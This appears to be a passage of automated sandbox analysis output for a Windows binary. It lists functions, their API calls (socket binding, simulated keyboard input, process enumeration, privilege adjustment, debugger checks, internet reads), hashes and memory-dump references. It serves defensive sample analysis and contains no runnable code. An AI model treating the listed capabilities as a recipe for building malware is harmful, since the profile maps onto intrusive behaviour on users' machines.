                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                • String ID:
                • API String ID: 1601658205-0
                • Opcode ID: d98480166a8edc032efe8b8777df0219acc917794883b59bc620ed47954ff0a6
                • Instruction ID: 7a47543a7b0faae74f52e94f54ddc0881d76ac9c26bfef39048e55c2439dd45d
                • Opcode Fuzzy Hash: d98480166a8edc032efe8b8777df0219acc917794883b59bc620ed47954ff0a6
                • Instruction Fuzzy Hash: B451B371A00210AFDB14AF24D88AF6A77E5AB59718F08809CF9155F3D3D771AD818BE1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 001A1C41 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Window$EnabledForegroundIconicVisibleZoomed
                • String ID:
                • API String ID: 292994002-0
                • Opcode ID: 5b911373facb34d535cb22fe76a40af8733db3a80df5fac436352c10495b0327
                • Instruction ID: 0aa802aed6a098ebadf2a670891198ee41536e5b2c67ec1eaef7c24642e07bcf
                • Opcode Fuzzy Hash: 5b911373facb34d535cb22fe76a40af8733db3a80df5fac436352c10495b0327
                • Instruction Fuzzy Hash: 4821B5397402116FD7248F2AC844B6A7BE5EF96324F198068E84ACB355C771DC42CBD4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00118060 Relevance: 7.4, Strings: 5, Instructions: 1151COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID:
                • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                • API String ID: 0-1546025612
                • Opcode ID: 2745eb558ff08ee1f0d27048bf5567d1b6a9894335e44e879bfdc08418d421aa
                • Instruction ID: 31f655dc8cbdef1ef728ab8efa3fc728ca310b1a050743ff8a8296412f439ebb
                • Opcode Fuzzy Hash: 2745eb558ff08ee1f0d27048bf5567d1b6a9894335e44e879bfdc08418d421aa
                • Instruction Fuzzy Hash: 6BA27071E0061ACBDF28CF58C8507EDB7B2BB54311F6581AAEC25AB285DB709DC5CB90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0019A67C Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON
                Download Yara Rule
                APIs
                • CreateToolhelp32Snapshot.KERNEL32 ref: 0019A6AC
                • Process32FirstW.KERNEL32(00000000,?), ref: 0019A6BA
                  • Part of subcall function 00119CB3: _wcslen.LIBCMT ref: 00119CBD
                • Process32NextW.KERNEL32(00000000,?), ref: 0019A79C
                • CloseHandle.KERNEL32(00000000), ref: 0019A7AB
                  • Part of subcall function 0012CE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00153303,?), ref: 0012CE8A
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                • String ID:
                • API String ID: 1991900642-0
                • Opcode ID: 8d64b08e9e64f7de53d7d70b6d0050067629a405c2930ced86f86e727485e7d2
                • Instruction ID: 12560a5e519087c0b000a64637dc95d88103e6b7d5f36d71a1fc72c3a9881baf
                • Opcode Fuzzy Hash: 8d64b08e9e64f7de53d7d70b6d0050067629a405c2930ced86f86e727485e7d2
                • Instruction Fuzzy Hash: 1E519E71508300AFC714EF24D886AABBBF8FF99704F40892DF58997251EB30D944CB92
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0017AA57 Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON
                Download Yara Rule
                APIs
                • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 0017AAAC
                • SetKeyboardState.USER32(00000080), ref: 0017AAC8
                • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 0017AB36
                • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 0017AB88
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: KeyboardState$InputMessagePostSend
                • String ID:
                • API String ID: 432972143-0
                • Opcode ID: 74d8adef42c4a0e9f26bb0627ff92f3f5683764750996367118894cd7206eb91
                • Instruction ID: 20b9bf407199decbb84b917f1cd4a9a994b250fba041c40ccd1ebe8cc4b0ee19
                • Opcode Fuzzy Hash: 74d8adef42c4a0e9f26bb0627ff92f3f5683764750996367118894cd7206eb91
                • Instruction Fuzzy Hash: F4310730A80208AEFB35CA64CC05BFE7BB6AFD5310F84C21AF589971D1D7749985C7A2
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0018CE44 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON
                Download Yara Rule
                APIs
                • InternetReadFile.WININET(?,?,00000400,?), ref: 0018CE89
                • GetLastError.KERNEL32(?,00000000), ref: 0018CEEA
                • SetEvent.KERNEL32(?,?,00000000), ref: 0018CEFE
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: ErrorEventFileInternetLastRead
                • String ID:
                • API String ID: 234945975-0
                • Opcode ID: 89dfc7bccf9f4a1797d92f0ea7c525a35904773a91289d60f59d1c9162266ae0
                • Instruction ID: 3906d81540475d593dd772da9502195e217adb63ae0b8f46a752598498f293c6
                • Opcode Fuzzy Hash: 89dfc7bccf9f4a1797d92f0ea7c525a35904773a91289d60f59d1c9162266ae0
                • Instruction Fuzzy Hash: BF21ACB1500705ABEB30EFA5D948BA7BBFCEB51354F10841EE646D2151EB74EE448FA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00178298 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 568stringCOMMON
                Download Yara Rule
                APIs
                • lstrlenW.KERNEL32(?,?,?,00000000), ref: 001782AA
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: lstrlen
                • String ID: ($|
                • API String ID: 1659193697-1631851259
                • Opcode ID: 398c894d9bd9936b857e3b725c1c3e5caf09da902a0e8629fffb6219b3a635b7
                • Instruction ID: 2ae36482b619af4f406ac0017265e56d9f72bd9baf68db7d0b08c9f15d176060
                • Opcode Fuzzy Hash: 398c894d9bd9936b857e3b725c1c3e5caf09da902a0e8629fffb6219b3a635b7
                • Instruction Fuzzy Hash: 1A323474A006059FCB28CF69C485A6AB7F0FF48710B15C56EE49ADB7A1EB70E981CB50
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00185C97 Relevance: 4.6, APIs: 3, Instructions: 138fileCOMMON
                Download Yara Rule
                APIs
                • FindFirstFileW.KERNEL32(?,?), ref: 00185CC1
                • FindNextFileW.KERNEL32(00000000,?), ref: 00185D17
                • FindClose.KERNEL32(?), ref: 00185D5F
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Find$File$CloseFirstNext
                • String ID:
                • API String ID: 3541575487-0
                • Opcode ID: 20687b5dafa1e9d10ca80b7f3b0485533bee64ae680cf0ce9b4029b6636ae684
                • Instruction ID: f2c1131116eb031140400425f5a46bdeaa7b4bc97cd3463b2c6d21630ba26588
                • Opcode Fuzzy Hash: 20687b5dafa1e9d10ca80b7f3b0485533bee64ae680cf0ce9b4029b6636ae684
                • Instruction Fuzzy Hash: 05519B34604A019FC718DF68C494E96B7E5FF49324F14866EE95A8B3A2CB30ED45CF91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00142622 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • IsDebuggerPresent.KERNEL32 ref: 0014271A
                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00142724
                • UnhandledExceptionFilter.KERNEL32(?), ref: 00142731
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                • String ID:
                • API String ID: 3906539128-0
                • Opcode ID: 8c7666383201e99389e43a7004739977ab9c2e60c9acf34007fbcbe489d06bfd
                • Instruction ID: 6b26d083077928949df626c3da23432466d7cc81685311ee1de1d1b014fb8aa7
                • Opcode Fuzzy Hash: 8c7666383201e99389e43a7004739977ab9c2e60c9acf34007fbcbe489d06bfd
                • Instruction Fuzzy Hash: 1131B47491122C9BCB21DF64DD897D9BBB8BF18310F5041EAE81CA7261E7709F818F45
                Uniqueness

                Uniqueness Score: -1.00%

                Function 001851CD Relevance: 4.6, APIs: 3, Instructions: 76COMMON
                Download Yara Rule
                APIs
                • SetErrorMode.KERNEL32(00000001), ref: 001851DA
                • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00185238
                • SetErrorMode.KERNEL32(00000000), ref: 001852A1
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: ErrorMode$DiskFreeSpace
                • String ID:
                • API String ID: 1682464887-0
                • Opcode ID: f6cfd168860bd84b0ea4ccd8551ed44450fc6422baec19bc3d4e2fc1eeafd55c
                • Instruction ID: 41a457d014e23a40e2cebbb95a0c7311615db8cd86e953dbafdcea88f05c9568
                • Opcode Fuzzy Hash: f6cfd168860bd84b0ea4ccd8551ed44450fc6422baec19bc3d4e2fc1eeafd55c
                • Instruction Fuzzy Hash: B8313E75A00518DFDB04EF54D884EADBBF5FF49314F048099E805AB3A2DB31E956CB90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 001716C3 Relevance: 4.6, APIs: 3, Instructions: 68COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 0012FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00130668
                  • Part of subcall function 0012FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00130685
                • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0017170D
                • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0017173A
                • GetLastError.KERNEL32 ref: 0017174A
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                • String ID:
                • API String ID: 577356006-0
                • Opcode ID: d8417a1bca92784ad516b806954e4a0e5008a7159be0caeb9f867f9d50d35c52
                • Instruction ID: 001a8c951f82156b28a6ed669b348b5afdc60e80349c44a42e5cf38949c64ac4
                • Opcode Fuzzy Hash: d8417a1bca92784ad516b806954e4a0e5008a7159be0caeb9f867f9d50d35c52
                • Instruction Fuzzy Hash: 651191B2404308BFD7189F54EC86D6BB7BDEB44714B20C52EF05657641EB70BC418B60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0017D5EB Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON
                Download Yara Rule
                APIs
                • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0017D608
                • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 0017D645
                • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0017D650
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: CloseControlCreateDeviceFileHandle
                • String ID:
                • API String ID: 33631002-0
                • Opcode ID: f4ec0324401952789e4a3205e2a67a3bc604f58cf0ed20559ba02f68a73b3014
                • Instruction ID: 4a1234450204ac45a7741f50a7587681fcbf3b44afdb4bee4a5d193836cb00ab
                • Opcode Fuzzy Hash: f4ec0324401952789e4a3205e2a67a3bc604f58cf0ed20559ba02f68a73b3014
                • Instruction Fuzzy Hash: DC115E75E05228BFDB108F95EC45FAFBBBCEB45B50F108116F908E7290D6704A058BE1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00171663 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                Download Yara Rule
                APIs
                • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0017168C
                • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 001716A1
                • FreeSid.ADVAPI32(?), ref: 001716B1
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: AllocateCheckFreeInitializeMembershipToken
                • String ID:
                • API String ID: 3429775523-0
                • Opcode ID: 7e6a3f3cc887e86e14186eccfc4621cc82fb4c8036c4fcc696e0e6f1dcddace8
                • Instruction ID: 7345038efa6e8a8688878d636477c467c3f917405cbb0198edcd5b869ec8d202
                • Opcode Fuzzy Hash: 7e6a3f3cc887e86e14186eccfc4621cc82fb4c8036c4fcc696e0e6f1dcddace8
                • Instruction Fuzzy Hash: 53F0F47595030DFBDB00DFE49D89AAEBBBCFB08604F508565F501E2181E774AA448A90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00134CE8 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • GetCurrentProcess.KERNEL32(001428E9,?,00134CBE,001428E9,001D88B8,0000000C,00134E15,001428E9,00000002,00000000,?,001428E9), ref: 00134D09
                • TerminateProcess.KERNEL32(00000000,?,00134CBE,001428E9,001D88B8,0000000C,00134E15,001428E9,00000002,00000000,?,001428E9), ref: 00134D10
                • ExitProcess.KERNEL32 ref: 00134D22
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Process$CurrentExitTerminate
                • String ID:
                • API String ID: 1703294689-0
                • Opcode ID: c2cee10e7cffc7409641f8951354a431a97f3c5719e58471da751fa5dba0f99b
                • Instruction ID: 113e28d1f47540e6e9f71a834f5be6a5a87788cb7937355d75e6c891b4d7f4cd
                • Opcode Fuzzy Hash: c2cee10e7cffc7409641f8951354a431a97f3c5719e58471da751fa5dba0f99b
                • Instruction Fuzzy Hash: EEE0B671000148ABCF11AF94DD09A593B69FF62791F104014FC159A532CB35EE82CA80
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0014C2A2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID:
                • String ID: /
                • API String ID: 0-2043925204
                • Opcode ID: 538b78c59ed437857fb4ecacd0a0f3a3777b1b24c3be0537096cfaf6f161ee98
                • Instruction ID: 6afd3dcc247a650598f974683ebe941af00ad12122057c122d111e6f92651a8d
                • Opcode Fuzzy Hash: 538b78c59ed437857fb4ecacd0a0f3a3777b1b24c3be0537096cfaf6f161ee98
                • Instruction Fuzzy Hash: 24412676901219ABCB249FB9CC89EBB77B8FB84314F504669F905D7190E7709D81CB90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0016D27A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                Download Yara Rule
                APIs
                • GetUserNameW.ADVAPI32(?,?), ref: 0016D28C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: NameUser
                • String ID: X64
                • API String ID: 2645101109-893830106
                • Opcode ID: 8ce4418fb315596fb3bca7972b6962ff33a1ddd81deda28cd8ecabae98d85369
                • Instruction ID: fa3cdfa9b621cc05297c3f7445d75482899c43f44ef9e6999cce9555651e4ba2
                • Opcode Fuzzy Hash: 8ce4418fb315596fb3bca7972b6962ff33a1ddd81deda28cd8ecabae98d85369
                • Instruction Fuzzy Hash: E8D0CAB880116DEACB98CBA0EC88DDAB3BCBB04305F100296F506A2000DB3096888F20
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0013CAA0 Relevance: 3.5, APIs: 2, Instructions: 464COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                • Instruction ID: 38b2547f1af15684dddf6fd3f0e7a636d4ce1ee3e2f3566e82b8bbbf7082897d
                • Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                • Instruction Fuzzy Hash: 47021D72E002199BDF14CFA9C8906ADFBF5EF58314F258169D819FB384D731AA418BD4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 001868EE Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                Download Yara Rule
                APIs
                • FindFirstFileW.KERNEL32(?,?), ref: 00186918
                • FindClose.KERNEL32(00000000), ref: 00186961
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Find$CloseFileFirst
                • String ID:
                • API String ID: 2295610775-0
                • Opcode ID: c519130fafd2812d1e8f6366756d28056aaf469c772a550b239032d29ca30f94
                • Instruction ID: ca040a610f5db201b7601ecdb285b896a8b875457179a34f7691238746e78c46
                • Opcode Fuzzy Hash: c519130fafd2812d1e8f6366756d28056aaf469c772a550b239032d29ca30f94
                • Instruction Fuzzy Hash: 03118E316042019FC714DF29D488A16BBE5EF85328F14C6A9E4698F7A2CB30ED45CBD1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 001837B5 Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON
                Download Yara Rule
                APIs
                • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00194891,?,?,00000035,?), ref: 001837E4
                • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00194891,?,?,00000035,?), ref: 001837F4
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
